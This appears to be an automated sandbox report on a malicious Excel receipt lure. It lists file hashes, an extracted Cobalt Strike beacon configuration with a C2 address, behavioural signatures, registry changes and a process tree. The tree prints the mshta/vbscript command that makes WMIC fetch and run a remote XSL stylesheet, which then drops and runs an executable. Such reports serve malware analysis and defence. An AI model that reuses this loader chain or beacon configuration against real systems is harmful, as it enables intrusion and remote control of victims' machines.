Analysis
- max time kernel: 1199s
- max time network: 1222s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 06-07-2021 16:57
- Static task: static1
- Behavioral task: behavioral1
- Sample: Reciept 0085830.xlsb
- Resource: win7v20210410
General
- Target: Reciept 0085830.xlsb
- Size: 66KB
- MD5: c311de66dc44401313f4f68773b4c1dc
- SHA1: 3eacc0d27518ceddf2268ed968bb2e2374bd4253
- SHA256: ef6d8a62c96a0fc27147b5d0116ec80c255634aa4d0379a96020afc6258731bf
- SHA512: 79c2ac6fb759bb89c4a70138a495f92b82efbd61c05fc9ef186807615647320612057482385dab99c492e62f8c437d68d49a5ed2136eb338acb88447e77fb96c
Malware Config
Extracted
- Family: cobaltstrike
- Watermark: 1359593325
- C2 URL: http://94.198.40.11:80/visit.js

Configuration fields:
- access_type: 512
- host: 94.198.40.11,/visit.js
- http_header1: AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
- http_header2: AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
- http_method1: GET
- http_method2: POST
- polling_time: 60000
- port_number: 80
- sc_process32: %windir%\syswow64\rundll32.exe
- sc_process64: %windir%\sysnative\rundll32.exe
- state_machine: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 4096
- unknown2: AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- uri: /submit.php
- user_agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
- watermark: 1359593325
Signatures
- Cobaltstrike
  Detected malicious payload which is part of Cobaltstrike.
  Processes (resource / yara_rule):
    C:\Windows\Temp\68w43.exe / cryptone
- Blocklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
    6 / 1888 / WMIC.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoC)
  Processes (pid / process):
    1640 / 68w43.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Office loads VBA resources, possible macro or embedded object present
- Enumerates system info in registry (2 TTPs, 1 IoC)
  Processes (description / ioc / process):
    Key opened / \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor / EXCEL.EXE
- Modifies Internet Explorer settings
  Processes (description / ioc / process):
    Set value (str) / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" / EXCEL.EXE
    Set value (int) / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" / EXCEL.EXE
    Set value (int) / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" / EXCEL.EXE
    Key created / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main / mshta.EXE
    Key created / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar / EXCEL.EXE
    Set value (str) / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" / EXCEL.EXE
    Key created / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote / EXCEL.EXE
    Key created / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt / EXCEL.EXE
    Key created / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel / EXCEL.EXE
    Set value (str) / \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" / EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid / process):
    1728 / EXCEL.EXE
- Suspicious use of AdjustPrivilegeToken (41 IoCs)
  Processes (description / pid / process):
    The following 20 token entries are each recorded twice for pid 1888 / WMIC.exe (40 entries):
      Token: SeIncreaseQuotaPrivilege
      Token: SeSecurityPrivilege
      Token: SeTakeOwnershipPrivilege
      Token: SeLoadDriverPrivilege
      Token: SeSystemProfilePrivilege
      Token: SeSystemtimePrivilege
      Token: SeProfSingleProcessPrivilege
      Token: SeIncBasePriorityPrivilege
      Token: SeCreatePagefilePrivilege
      Token: SeBackupPrivilege
      Token: SeRestorePrivilege
      Token: SeShutdownPrivilege
      Token: SeDebugPrivilege
      Token: SeSystemEnvironmentPrivilege
      Token: SeRemoteShutdownPrivilege
      Token: SeUndockPrivilege
      Token: SeManageVolumePrivilege
      Token: 33
      Token: 34
      Token: 35
    Token: SeShutdownPrivilege / 1728 / EXCEL.EXE
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes (pid / process):
    1728 / EXCEL.EXE (3 entries)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description / pid / process / target process):
    PID 1556 wrote to memory of 1664 / 1556 / taskeng.exe / mshta.EXE (3 entries)
    PID 1664 wrote to memory of 1888 / 1664 / mshta.EXE / WMIC.exe (3 entries)
    PID 1888 wrote to memory of 1640 / 1888 / WMIC.exe / 68w43.exe (4 entries)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0085830.xlsb"
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
- C:\Windows\system32\taskeng.exe (depth 1)
  Command line: taskeng.exe {50B946E6-C2A4-46B5-AEE7-7D2C1E97B544} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\mshta.EXE (depth 2)
    Command line: C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOLEDBQuery.xsl"" & Chr(34)),0:close")
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\wbem\WMIC.exe (depth 3)
      Command line: "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOLEDBQuery.xsl"
      - Blocklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Temp\68w43.exe (depth 4)
        Command line: "C:\Windows\Temp\68w43.exe"
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\qOLEDBQuery.xsl
  MD5: 406f4c54f22f973d09c6b2af9e220622
  SHA1: f11ea0a6427f20028ebb1882adeae1d8359fbcd3
  SHA256: c8a27b11d7765c96f0e8c16df06d9fa8dd9485b6d588f552d71b8e9b703e0280
  SHA512: 6825a2cdb52b6cdedd5d80e4eebb0f756a2f56704f514159b3637ccfa8ed3a1ed3db9f2fa75809f94d1c4ba4faddb941c8fcd13e87f59535b72363898b29c6de
- C:\Windows\Temp\68w43.exe
  MD5: 9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
  SHA1: d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
  SHA256: b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
  SHA512: c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6
- memory/1640-69-0x0000000075971000-0x0000000075973000-memory.dmp (Filesize: 8KB)
- memory/1640-67-0x0000000000000000-mapping.dmp
- memory/1640-70-0x0000000000220000-0x0000000000267000-memory.dmp (Filesize: 284KB)
- memory/1640-71-0x0000000000400000-0x0000000000453000-memory.dmp (Filesize: 332KB)
- memory/1640-72-0x00000000002A0000-0x00000000002D3000-memory.dmp (Filesize: 204KB)
- memory/1640-73-0x0000000000460000-0x000000000049D000-memory.dmp (Filesize: 244KB)
- memory/1664-63-0x0000000000000000-mapping.dmp
- memory/1664-64-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp (Filesize: 8KB)
- memory/1728-62-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/1728-61-0x00000000716F1000-0x00000000716F3000-memory.dmp (Filesize: 8KB)
- memory/1728-60-0x000000002F091000-0x000000002F094000-memory.dmp (Filesize: 12KB)
- memory/1888-65-0x0000000000000000-mapping.dmp